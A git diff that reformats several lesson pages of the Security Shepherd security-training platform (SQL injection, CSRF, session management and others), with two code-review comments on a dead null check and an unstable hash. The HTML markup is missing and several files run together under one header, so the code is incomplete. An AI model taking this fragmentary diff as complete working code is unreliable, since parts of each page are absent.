--- a/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
+++ b/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
@@ -1,110 +1,117 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- //No Quotes In level Name
- String levelName = "What is Poor Authentication?";
+//No Quotes In level Name
+String levelName = "What is Poor Authentication?";
//Alphanumeric Only
- String levelHash = "77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e";
+String levelHash = "77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_poor_authentication." + levelHash, locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_poor_authentication." + levelHash, locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
//Used more than once translations
- String translatedLevelName = bundle.getString("title.question.m_poor_authentication");
+String translatedLevelName = bundle.getString("title.question.m_poor_authentication");
/**
*
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
*
* @author Sean Duggan
*/
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ //No Quotes In level Name
+ String levelName = "Mobile Broken Crypto?";
+ //Alphanumeric Only
+ String levelHash = "911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212";
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_broken_crypto." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.mobile_broken_crypto");
+
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Session Management Lesson";
- final String LEVEL_HASH = "b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806";
+ final String LEVEL_NAME = "Session Management Lesson";
+ final String LEVEL_HASH = "b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.session_manage." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.session_manage");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.session_manage." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.session_manage");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sessionManagement");
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sessionManagement");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "SQL Injection Lesson";
- final String LEVEL_HASH = "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594";
+ final String LEVEL_NAME = "SQL Injection Lesson";
+ final String LEVEL_HASH = "e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.sql_injection." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.sql_injection");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.sql_injection." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.sql_injection");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sqli");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sqli");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ //No Quotes In level Name
+ String levelName = "What is Mobile Insecure Data Storage?";
+ //Alphanumeric Only
+ String levelHash = "ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f";
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_insecure_data_storage." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.m_insecure_data_storeage");
+
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
-<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+<%
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
%>
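Review bot: `request.getSession() != null` in the reformatted `if` is always true, because the no-argument `getSession()` creates a session when none exists and never returns null, so the outer `else` that redirects to `../loggedOutSheep.html` cannot run. The access decision therefore rests entirely on `Validate.validateSession(ses) && tokenCookie != null`, whose implementation is not visible in this diff. I would either drop the dead branch or write `HttpSession ses = request.getSession(false);` followed by `if (ses != null)`, in which case the earlier `Validate.validateLanguage(request.getSession())` call would need the non-creating form as well. The same check recurs in each scriptlet shown in this section and in the `ed4182af…jsp` hunk that follows.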
diff --git a/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp b/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
index bd8643021..0a5690ccf 100644
--- a/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
+++ b/src/main/webapp/lessons/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.jsp
@@ -1,190 +1,197 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "CSRF Lesson";
- final String LEVEL_HASH = "ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7";
+ final String LEVEL_NAME = "CSRF Lesson";
+ final String LEVEL_HASH = "ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.csrf." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.csrf");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.csrf." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.csrf");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.csrf");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.csrf");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
- // Getting Session Variables
- String hex = (String) ses.getAttribute("userName");
- String falseId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
- ses.setAttribute("falseId", falseId);
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ // Getting Session Variables
+ String hex = (String) ses.getAttribute("userName");
+ String falseId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
+ ses.setAttribute("falseId", falseId);
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ $("#showLesson").click(function(){
+ $('#showLesson').hide("fast", function(){
+ $("#lessonIntro").show("slow");
+ });
+ });
+
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>
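Review bot: `hex.getBytes().hashCode()` in the `falseId` line is the identity hash of a temporary array, not a hash of the user name's bytes, because Java arrays do not override `hashCode()`; that term can differ on every request. If the id is meant to be derived from the user name, `Arrays.hashCode(hex.getBytes(StandardCharsets.UTF_8))` gives a stable value (both classes would have to be added to the page's import list); if it is meant to be unpredictable, that intent is not visible here and a comment or a `SecureRandom`-based value would state it. `new Integer(...)` is deprecated, so the wrapper can become `Integer.toString(...)`. `hex` is also dereferenced without a null check, which presumably relies on `Validate.validateSession` having confirmed that `userName` is set.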
diff --git a/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp b/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
index 7a229658b..0b1106c37 100644
--- a/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
+++ b/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
@@ -1,188 +1,196 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
